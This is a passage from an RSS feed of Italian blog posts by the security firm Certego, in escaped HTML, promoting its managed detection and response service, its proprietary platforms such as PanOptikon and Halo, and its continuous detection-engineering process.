&lt;p&gt;In questo modo il valore dell’MDR non si misura sulla quantità di alert, ma sulla loro qualità: meno rumore, più sicurezza, più velocità.
Il beneficio è concreto: tempi di risposta più rapidi, meno stress sul team, meno escalation inutili, più incidenti reali riconosciuti in tempo. Questo approccio ci permette di garantire un servizio MDR sempre aggiornato, personalizzabile e realmente efficace, senza compromessi.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;/website/13eef96f25fe5b977ed7c9d67a2628a3/Ecosistema applicativo Certego.pdf&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACrklEQVR42jWSW0tUURiG5wcEQaFRqZ0sM63IrMjKhCAPF12Jd0J0UwR1U1ddlJ2gME9EQUVloJKjZVl4LC2dnJPjjHPSGWfvmXHv2eNkakQQzcV+WjPSxcP7rg/WWt/7rWXwSir97ig+WcEdUnAEFSyBeayClHeFVuszskp0PkZEEIsniCoaSmwBVUuka5oWT2nSkNrY8DXES4tMy5iU9imahb83OkfTWIjHJok2WxhFiSFHY4yOmwlJEWwOJxPWSaSoyrhXIhCKJA1+cfOAV6HXKfPaLvPcLNHnCvNR0Dkp0z0V5oMrijWoEo9pSNoS15qfMTYywpsJNw1PW/F4fDw09uFweZOGaRGn6bOPRzaNRlOETqdKr2+BDmeMLpdKu03miSlIvyOAFJLxByTRlQP/bJCZsIrbHyAsOvQEI0JFZIvVTkNjC3fvP+DJs+fcuXWb+voG6upuMjQ4zEJikXMXr1BUWk7xyXIOlp7m0MkKsa5gcMTE799/0BYWWVr+ybyiJQ2+mSA973ppa+tgaPgzxu631D9o5PqNm4x/MxNR4pSUV7Mu9zBHS09RWHKKrMITZG7fy5maWi5cvsrZ85c4f/nKauR5Nc73HyssrfwisbicVi3xg7ggVQ+K4ZdW1ZCzr4y8w6fZe6ySvCNVZGzbRcaWXNZk5rBmQzZrN21l4NOXpCEwJ2O1T6VxON1MuTxp7A4XHt8MUkShsrqWrPxidhYdJ7/4BLniwMwdBWwvOEBO/n427ywke/c+hkfHk4bZoMS3CSsTFhsWm0OoHZvdma6ZxXwnp6aZ9vhFHA/TXj9fTFZy9peJjraxcUc+GVvzWJ+dK/ye1QPFC+lyRNH/63+fQgorekiO6mLYuvjAekwQVeK68f2g/qLttf6qoytNa7tRbzf2MDsn//0HNFlcJ1R2JgoAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Ecosistema Applicativo Certego&quot; title=&quot;&quot; src=&quot;/website/static/b036ec71a29d08690e4e86f3a043f86e/71c1d/Ecosistema%20Applicativo%20Certego.png&quot; srcset=&quot;/website/static/b036ec71a29d08690e4e86f3a043f86e/804b2/Ecosistema%20Applicativo%20Certego.png 384w,
/website/static/b036ec71a29d08690e4e86f3a043f86e/e5715/Ecosistema%20Applicativo%20Certego.png 768w,
/website/static/b036ec71a29d08690e4e86f3a043f86e/71c1d/Ecosistema%20Applicativo%20Certego.png 1536w,
/website/static/b036ec71a29d08690e4e86f3a043f86e/a878e/Ecosistema%20Applicativo%20Certego.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;</content:encoded></item><item><title><![CDATA[MDR su misura]]></title><description><![CDATA[Quando le tecnologie proprietarie fanno la differenza]]></description><link>https://www.certego.net/blog/mdr-su-misura-quando-le-tecnologie-proprietarie-fanno-la-differenza/</link><guid isPermaLink="false">mdr-su-misura-quando-le-tecnologie-proprietarie-fanno-la-differenza</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Tue, 26 Aug 2025 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Nella cybersecurity spesso si parla di strumenti: MDR, SIEM, XDR. Ma raramente ci si chiede chi controlla davvero questi strumenti. Le aziende si ritrovano così a dipendere da soluzioni chiuse, sviluppate da fornitori esterni con roadmap decise da terze parti. Un approccio che limita la possibilità di adattare la difesa ai propri bisogni reali.&lt;/p&gt;
&lt;p&gt;Ecco perché in Certego abbiamo scelto di costruire un &lt;strong&gt;ecosistema applicativo proprietario&lt;/strong&gt;: perché solo possedendo la tecnologia è possibile modellare l’MDR sulle esigenze specifiche di ogni cliente e creare soluzioni che sfruttino al massimo le competenze di analisti esperti.
Le nostre piattaforme, infatti, vengono sviluppate “a più mani”: i team di sviluppo, Security Operations. Threat Detection e Threat Intelligence collaborano costantemente, definendo insieme le funzionalità che permettono agli analisti di lavorare meglio, più velocemente e con maggiore efficacia.&lt;/p&gt;
&lt;h2&gt;Perché puntare su un ecosistema applicativo proprietario&lt;/h2&gt;
&lt;p&gt;L’ecosistema applicativo proprietario di Certego nasce con alcuni obiettivi chiave:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Soluzioni su misura per analisti esperti&lt;/strong&gt;: ogni componente è progettato pensando ai flussi di lavoro avanzati del team di Security Operations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Indipendenza da terze parti&lt;/strong&gt;: controllo totale dell’architettura e nessuna dipendenza da roadmap esterne.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Innovazione continua&lt;/strong&gt;: aggiornamenti rapidi basati sull’evoluzione delle minacce.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Conformità e sicurezza&lt;/strong&gt;: pieno rispetto del GDPR e delle normative europee.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Questo approccio ci permette di garantire un MDR sempre aggiornato, personalizzabile e realmente efficace, senza compromessi.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 53.90625%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAC4jAAAuIwF4pT92AAABNElEQVR42oVSyVLDMAzN//8QNw4ww3DhwClDB1qW0LhOEydx4kWyZNyEJbQsb3SRLD3pSc5ijMwcF0guAHjvETG5gNh1nbUuniCTsipLIWSVCGaOEEKrEpqu7xOTcX4yIOLj4mpfF1VTCElEh0pmiwQcPxM9eKVaa+0PnVMSBHbEjUUfSDu4vLktShH4XU4iNcbMEpi/ScxSRAEjMdDhBUOoGuW8n5N4BiLzYeiqVrt9zR/xLDGfPbYOw2Jhx+OxMXFSHCZ8dU5TPTcaFsU0CeZhiIibUj6sN3erVZ7nQuySlgHJUdTDKKXMmML5k7IwSVoYTSK3dfdSimJbvopd2/cusAY2IY7WDVpnHsBona4af4EnNkh+sf/lwv4BhXBxda2tP/1OfxXPqWYc8/t13Xand34DsPOEEFeqWFYAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Gallery 1&quot; title=&quot;&quot; src=&quot;/website/static/ff2c539bb09f25db64ec984c4abdeecd/71c1d/Ecosistema%20Applicativo%202025%20Certego.png&quot; srcset=&quot;/website/static/ff2c539bb09f25db64ec984c4abdeecd/804b2/Ecosistema%20Applicativo%202025%20Certego.png 384w,
/website/static/ff2c539bb09f25db64ec984c4abdeecd/e5715/Ecosistema%20Applicativo%202025%20Certego.png 768w,
/website/static/ff2c539bb09f25db64ec984c4abdeecd/71c1d/Ecosistema%20Applicativo%202025%20Certego.png 1536w,
/website/static/ff2c539bb09f25db64ec984c4abdeecd/a878e/Ecosistema%20Applicativo%202025%20Certego.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;PanOptikon®: la cabina di regia unificata&lt;/h2&gt;
&lt;p&gt;PanOptikon® è la piattaforma SaaS unificata di Security Operations che porta in un unico ambiente tutte le attività di SecOps, diventando il cuore operativo del Security Operations Center di Certego.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Visibilità completa sugli ambienti IT&lt;/strong&gt;: offre un quadro unico e centralizzato su infrastrutture, endpoint, cloud e flussi di rete.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Aggregazione e arricchimento dei dati&lt;/strong&gt;: raccoglie informazioni da più fonti di sicurezza e le potenzia con dati avanzati di Threat Intelligence (IOC) e Threat Detection (BIOC)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Analisi avanzate&lt;/strong&gt;: trasforma i dati grezzi in insight utili per il rilevamento proattivo delle minacce e la loro mitigazione.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Rilevamento e risposta personalizzate&lt;/strong&gt;: consente di definire regole di detection e procedure di tactical response su misura, adattate alle esigenze di ogni cliente.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Collaborazione unificata&lt;/strong&gt;: centralizza tutte le interazioni tra il team SecOps di Certego e i clienti, ottimizzando comunicazione, gestione degli incidenti e processi decisionali.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Gestione end-to-end degli incidenti&lt;/strong&gt;: segue il framework NIST, orchestrando le attività di risposta in un flusso unico e sicuro.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ottimizzazione dei processi di risposta&lt;/strong&gt;: accelera i tempi di reazione, riduce i downtime e mitiga i rischi in maniera efficiente.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;OReportistica avanzata conforme alle normative&lt;/strong&gt;: garantisce trasparenza e aderenza a GDPR e standard europei.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;PanOptikon®, offre una vera e propria “cabina di regia” che integra dati, persone, processi e tecnologie, migliorando la resilienza complessiva contro le minacce informatiche.&lt;/p&gt;
&lt;h2&gt;Halo: il cuore della Detection Engineering&lt;/h2&gt;
&lt;p&gt;Per sfruttare al massimo prestazioni delle soluzioni EDR e fornire servizi MDR di livello avanzato, Certego ha sviluppato Halo, la piattaforma che si integra con gli EDR dei vendor per raccogliere, analizzare e arricchire la telemetria degli endpoint. In questo modo, supera i limiti dei sistemi tradizionali spesso limitati da regole “black box”.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Estende la visibilità ai dati telemetrici grezzi degli endpoint&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Consente di definire regole di detection personalizzate sul contesto operativo&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Riduce drasticamente i falsi positivi grazie alla correlazione avanzata&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Integra IOC e BIOC da fonti multiple, senza limiti di importazione&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Halo è stata progettata per gli analisti Certego, che possono così contare su un patrimonio unico: la raw telemetry, indispensabile per una detection accurata e analisi maggiormente approfondite.&lt;/p&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;/website/adfa4215f2b58059906d0694d5bbff34/Halo - Unlimited Visibility - Generic.pdf&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAC4jAAAuIwF4pT92AAACGklEQVR42l2SS2/TQBSF/UtBSF2ggpAqCIuAIpC6QEIIgdiAukcpAgQllLZpEtE2jyZ+x3aclx3bY8cO6ZasfJg7hkVZHN3HeD6fuTOSv4jgcWWrKwRhjLkXgHoBKSi0+BupR7nY44cIowR9WUe9dYZGowVF1TcSLbIgQLW6D023kGZX8P0AxoRB57JmDO6cYThlMHk9nkeY+4UJMmCYjtgnyxqGlrOR4ijG+94Ydx4+wu2tLRzXm8jSDKd6hOrlEl/kRKhuxPg0SPBVSYRTFpLLAkpOWZxSvpGcWYBdeY175acoP3uJ0oMSB65wokU41GKccFBNTfCD5wQ91qmOcW5zUFBAfTEKRnEjLXjxohOgtPscN27ewqvXb7D+tcaRGuFjP8Z+P8GBUoBbJkPXYQLaMAkYiqNfA4bcsjv1UX5cEXOMlytxARc248db4sMgxXd9iZq25DGDPk2QxQxhyP5BrgOpuOzL0A0Llu3CdsZiLkPLhqzoUDSTD31YDF4xoPKaeoZp829GWNDL4DdO0SMgbX77bg/b23exs3MflcoTjCdzmEMHzeZPnJ23hbq9PuqnTVy0u0LtTg8dLte2Meh1YRk6zXQj0Xsiu85oIhyO3Kk4wnTmCyj16QfueMbXKPdE7vLcdGY4GIT43PXwTWVQJ0wAc9IiiHPulkcmag4V+f+ivs8jn2E+8eL80EjzIzPNa0YG2WW//wBIBbO4b5N+8gAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Halo PDF link&quot; title=&quot;&quot; src=&quot;/website/static/2a120dec32f1fb1be1ce97e9430a46e8/71c1d/Halo%20PDF%20link.png&quot; srcset=&quot;/website/static/2a120dec32f1fb1be1ce97e9430a46e8/804b2/Halo%20PDF%20link.png 384w,
/website/static/2a120dec32f1fb1be1ce97e9430a46e8/e5715/Halo%20PDF%20link.png 768w,
/website/static/2a120dec32f1fb1be1ce97e9430a46e8/71c1d/Halo%20PDF%20link.png 1536w,
/website/static/2a120dec32f1fb1be1ce97e9430a46e8/a878e/Halo%20PDF%20link.png 2048w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Threat Intelligence: decisioni basate su dati affidabili&lt;/h2&gt;
&lt;p&gt;La Threat Intelligence è un pilastro fondamentale dell’ecosistema e dell’approccio MDR di Certego. Grazie a piattaforme proprietarie come IntelOwl e Quokka, siamo in grado di migliorare la raccolta, la correlazione, l’arricchimento e l’analisi degli IOC, trasformandoli in informazioni realmente utili per gli analisti.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Raccolta estesa e diversificata&lt;/strong&gt;: dati provenienti da honeypot, sensori distribuiti, info-sharing community e dark web.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Classificazione contestualizzata&lt;/strong&gt;: IOC valutati in maniera contestualizzata, con verdetti affidabili e utilizzabili in modo operativo.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Arricchimento e validazione automatizzate&lt;/strong&gt;: i dati vengono potenziati con fonti esterne e verificati tramite processi automatici, riducendo errori e falsi positivi.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Insight azionabili&lt;/strong&gt;: informazioni precise e aggiornate per supportare decisioni rapide e consapevoli in caso di incidente.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In questo modo, gli analisti dispongono sempre di una base solida di dati attendibili, essenziale per potenziare detection, risposta e capacità predittive contro le minacce emergenti.&lt;/p&gt;
&lt;h2&gt;Hyperautomation: efficienza e rapidità su larga scala&lt;/h2&gt;
&lt;p&gt;La Hyperautomation applicata ai servizi MDR permette di trasformare attività ripetitive e manuali in processi automatizzati, liberando tempo prezioso per gli analisti (e anche i clienti!) e migliorando l’efficacia complessiva delle operazioni di sicurezza.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Riduzione del carico manuale&lt;/strong&gt;: automazione di routine di triage, correlazione e risposta, con un impatto diretto sull’efficienza quotidiana.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Decisioni più rapide e affidabili&lt;/strong&gt;: grazie all’analisi automatica di trend e pattern, vengono evidenziate priorità e possibili contromisure in tempi ridotti.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalabilità&lt;/strong&gt;: adattamento dinamico al numero crescente di alert, mantenendo invariata la qualità della detection e della risposta.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Il risultato è un servizio MDR capace di operare in maniera continua, scalabile e snella, dove l’automazione accelera i processi senza sostituire il ruolo critico dell’esperienza umana nei momenti più complessi.&lt;/p&gt;
&lt;h2&gt;Un ecosistema integrato per un servizio MDR altamente personalizzabile&lt;/h2&gt;
&lt;p&gt;In Certego, le diverse piattaforme – PanOptikon®, Halo, le soluzioni di Threat Intelligence e i processi di Hyperautomation – non sono strumenti separati, ma parti di un ecosistema applicativo proprietario e interconnesso. Ogni tecnologia dialoga con le altre, condividendo dati e insight in tempo reale, così da garantire un flusso operativo sinergico che potenzia la detection, accelera la risposta e assicura un MDR realmente coordinato, efficace e su misura.&lt;/p&gt;
&lt;p&gt;Affidarsi a un provider MDR che utilizza strumenti di terze parti rischia di non essere sufficiente. Solo un ecosistema applicativo proprietario assicura indipendenza tecnologica, rapidità di innovazione e servizi davvero personalizzati per ogni azienda.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Evolvere per restare efficaci]]></title><description><![CDATA[Perché la Detection Engineering è la chiave per una protezione sempre aggiornata]]></description><link>https://www.certego.net/blog/detection-engineering-detection-engineering-per-una-protezione-sempre-aggiornata/</link><guid isPermaLink="false">detection-engineering-detection-engineering-per-una-protezione-sempre-aggiornata</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing]]></dc:creator><pubDate>Mon, 18 Aug 2025 22:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Detection Engineering come disciplina continua: migliorare nel tempo, reagire più in fretta&lt;/h2&gt;
&lt;p&gt;Nel mondo della cybersecurity, ciò che funziona oggi potrebbe essere già inefficace domani. Le tecniche d’attacco cambiano, gli strumenti evolvono, gli attaccanti sperimentano. In questo scenario in continua trasformazione, la vera forza di un servizio MDR non sta solo nella quantità di regole implementate, ma nella capacità di adattare e migliorare costantemente quelle esistenti.
Il valore della Detection Engineering non risiede solo nella progettazione iniziale delle regole, ma nella gestione del loro intero ciclo di vita: dalla creazione alla validazione, dal tuning alla sostituzione.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Una detection che si adatta resta efficace più a lungo&lt;/h2&gt;
&lt;p&gt;Le soluzioni EDR offrono spesso regole di detection predefinite pensate per adattarsi a un&apos;ampia varietà di ambienti e utenti, garantendo una copertura iniziale efficace su scenari comuni e minacce note. Tuttavia, queste regole sono spesso preconfigurate in modalità black-box: non è possibile analizzarne nel dettaglio la logica, né personalizzarle in modo profondo per rispondere a esigenze operative specifiche.
Questa generalizzazione, se da un lato consente una protezione immediata e trasversale, dall’altro potrebbe in alcuni casi limitare  la capacità di individuare comportamenti anomali e tecniche più sottili, che si manifestano solo in contesti specifici. In ambienti complessi o soggetti a minacce mirate, l’assenza di personalizzazione può quindi tradursi in una visibilità ridotta su attività malevole rilevanti.&lt;/p&gt;
&lt;p&gt;Un servizio MDR efficace, invece, ha bisogno di poter scrivere, aggiornare e perfezionare le proprie regole di detection, con l’obiettivo di condurre analisi più profonde e ottenere tempi di reazione più rapidi. Questo approccio consente di adattare la detection al reale profilo operativo e di rischio dell’organizzazione, migliorando in modo significativo la qualità degli alert.
Nell&apos;approccio MDR di Certego, la Detection Engineering è concepita come un processo iterativo in cui ogni segnalazione è anche un’occasione di apprendimento.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Ciclo di vita di una regola di Detection&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Design&lt;/strong&gt;: partendo da indicatori, TTP e contesto del cliente&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deploy&lt;/strong&gt;: validazione su piccoli sottoinsiemi, ambienti di staging&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Osservazione&lt;/strong&gt;: analisi dei risultati in produzione&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Tuning&lt;/strong&gt;: affinamento di soglie, condizioni e correlazioni&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Retire o evolve&lt;/strong&gt;: regole dismesse, sostituite o integrate&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;br&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;https://www.certego.net/blog/detection-engineering-perche-le-regole-di-detection-standard-non-possono-bastare/&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
      &lt;span class=&quot;gatsby-resp-image-background-image&quot; style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAAsSAAALEgHS3X78AAACMElEQVR42mWSzWsTQRjGF4R68+SlHkUQrBEERYogiIgUwSpY1CL0oKjVQjGmKjlVKcUIKlQxta0pJClBhZqYNilJ8900cbNJN1l3m2S/d2Z2k7RpyH/gpDmJ8PDwMjO/l5nnHUJWYYnhtiuCqiHlX8kaQgAlRS3EiHvNpoYMvEgWSpFUdj0SoxmWkBSw7PWvBNaKDKcAXd5nupJUuKPXFtOFnumlpxMfWLay227RJY7aYrIkxbBlAp9I/87nchRNFyGAEKKuAEC4b6PZcjk8xMA94tIj09E7zs8Bo1FvtdsA1TVoEKKKNrb1Am9QVT1XhpscpMoQFzQP9+E9l9NHEKcOmN/2Db45e3DkfP/wSmiz1mhoEHXgcBEk/8BQEawWwK888OawwzQLZQXUd3e+f4sdI4Z6j9y6OrN07eXioZ7LpsMjtqmfVRl04CCNEizyF1C2bJAVPVTSyYrByQbOUjdqG1nm7jnblV7zhf7nNyYdF6/bhk5OPhydi0cZ/GaUKinBvLJWUHIML4tSlRd5XuAFCWeGRyBp8NU7zwOLfdRqtzxbuO9wPX7/ZdrizCxvddLOU3mSzGEPhyOReDKWSK1H4tFYkhcVPBsEa1GuOL7w6cX812HrjPn17LjV/nHWkclQBN6uCHKFlwRJE2VNkFTsoqRiEvftTBtfXq95VxODt6eOnxgz9T05c3rs5sDED0+4A6tAx+p+jP+LLm/UGizL+3wxtzvgcgfn5v3pTfov2m29IuT7LvIAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;&gt;&lt;/span&gt;
  &lt;img class=&quot;gatsby-resp-image-image&quot; alt=&quot;Inside Detection Engineer 1 Certego&quot; title=&quot;&quot; src=&quot;/website/static/83a1edb7b3b16a119eb416bb5ce73b91/71c1d/Inside%20Detection%20Engineer%201%20Certego.png&quot; srcset=&quot;/website/static/83a1edb7b3b16a119eb416bb5ce73b91/804b2/Inside%20Detection%20Engineer%201%20Certego.png 384w,
/website/static/83a1edb7b3b16a119eb416bb5ce73b91/e5715/Inside%20Detection%20Engineer%201%20Certego.png 768w,
/website/static/83a1edb7b3b16a119eb416bb5ce73b91/71c1d/Inside%20Detection%20Engineer%201%20Certego.png 1536w,
/website/static/83a1edb7b3b16a119eb416bb5ce73b91/01294/Inside%20Detection%20Engineer%201%20Certego.png 1615w&quot; sizes=&quot;(max-width: 1536px) 100vw, 1536px&quot; style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot; loading=&quot;lazy&quot; decoding=&quot;async&quot;&gt;
    &lt;/span&gt;
  &lt;/a&gt;
&lt;/div&gt;
&lt;br&gt;
&lt;br&gt;
&lt;h2&gt;Caso reale: evoluzione guidata dai dati&lt;/h2&gt;
&lt;p&gt;Un cliente del settore finanziario ha subito un attacco mirato con finalità di esfiltrazione dati. L’attaccante, dopo aver compromesso un host, ha avviato sessioni FTP cifrate in uscita verso un dominio legittimo precedentemente compromesso. La prima regola sviluppata dal team MDR generava alert su ogni connessione FTP anomala, ma il rumore generato era eccessivo, specialmente in contesti legacy.&lt;/p&gt;
&lt;p&gt;Attraverso l’analisi dei log e delle telemetrie grezze disponibili tramite Halo, è stato possibile:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Isolare pattern di esfiltrazione con payload ripetuti;&lt;/li&gt;
&lt;li&gt;Correlare la connessione con anomalie nei log DNS (attività fuori orario, IP geografici incoerenti);&lt;/li&gt;
&lt;li&gt;Integrare informazioni di reputazione dal feed di threat intelligence Certego;&lt;/li&gt;
&lt;li&gt;Il risultato è stata una regola evoluta, capace di rilevare comportamenti simili con maggiore precisione, riducendo sensibilmente i falsi positivi e permettendo tempi di reazione più rapidi nei giorni successivi.&lt;/li&gt;
&lt;/ul&gt;
&lt;br&gt;
&lt;/br&gt;
&lt;h2&gt;Vantaggi strategici della Detection Engineering continua&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Adattamento costante&lt;/strong&gt;: le regole evolvono insieme alla minaccia&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Contesto operativo&lt;/strong&gt;: ogni modifica tiene conto del comportamento reale dell’infrastruttura&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Metriche e feedback&lt;/strong&gt;: alert validati guidano i miglioramenti successivi&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Questa flessibilità è possibile solo grazie a un ecosistema integrato, in cui analisti, threat intelligence e detection engineer lavorano in sinergia continua.
La Detection Engineering, in questo approccio, non è una pratica accessoria: è un processo strategico, che consente a un servizio MDR di migliorare ogni giorno, trasformando ogni tentativo di attacco bloccato in una risorsa utile per il futuro.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;h2&gt;Halo: la piattaforma di Certego che accelera l’evoluzione della detection&lt;/h2&gt;
&lt;p&gt;Per gestire in modo efficace il ciclo di vita delle regole di detection, servono strumenti che offrono visibilità approfondita dei dati telemetrici degli endpoint,, precisione operativa e libertà d’intervento. È qui che entra in gioco Halo, la piattaforma sviluppata da Certego per potenziare i servizi MDR con capacità avanzate di raccolta, analisi e personalizzazione.&lt;/p&gt;
&lt;p&gt;Con Halo, i team di Detection Engineer e Security Operations di Certego possono:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Accedere alla telemetria completa degli endpoint&lt;/strong&gt;, superando i limiti imposti dalle soluzioni EDR tradizionali e ottenendo una visibilità dettagliata libera da vincoli di tipo black-box.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Raccogliere e arricchire i dati grezzi&lt;/strong&gt;, visualizzando il contesto completo degli eventi di cybersecurity.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Analizzare in profondità la genesi degli alert&lt;/strong&gt;, comprendendo esattamente quali regole li hanno generati e su quali pattern comportamentali si sono attivati.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Riscrivere, perfezionare o creare nuove regole di rilevamento&lt;/strong&gt;, sulla base di evidenze concrete e indicatori ricorrenti emersi in uno o più ambienti reali.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Importare liberamente IOC da fonti esterne, senza limitazioni di importazioni imposti da vendor terzi&lt;/strong&gt;, integrandoli nel motore di detection con immediatezza.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Correlare eventi multipli e aggregarli in alert unici&lt;/strong&gt;, riducendo drasticamente il rumore e aumentando l’efficacia operativa del SOC.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Halo non si limita a supportare il processo di detection: lo trasforma in un ciclo virtuoso in cui ogni dato raccolto può generare valore, migliorare la precisione dei rilevamenti e accelerare la risposta agli incidenti&lt;/strong&gt;.
&lt;br&gt;
&lt;/br&gt;&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;a href=&quot;/website/adfa4215f2b58059906d0694d5bbff34/Halo - Unlimited Visibility - Generic.pdf&quot;&gt;
    &lt;span class=&quot;gatsby-resp-image-wrapper&quot; style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1536px; &quot;&gt;
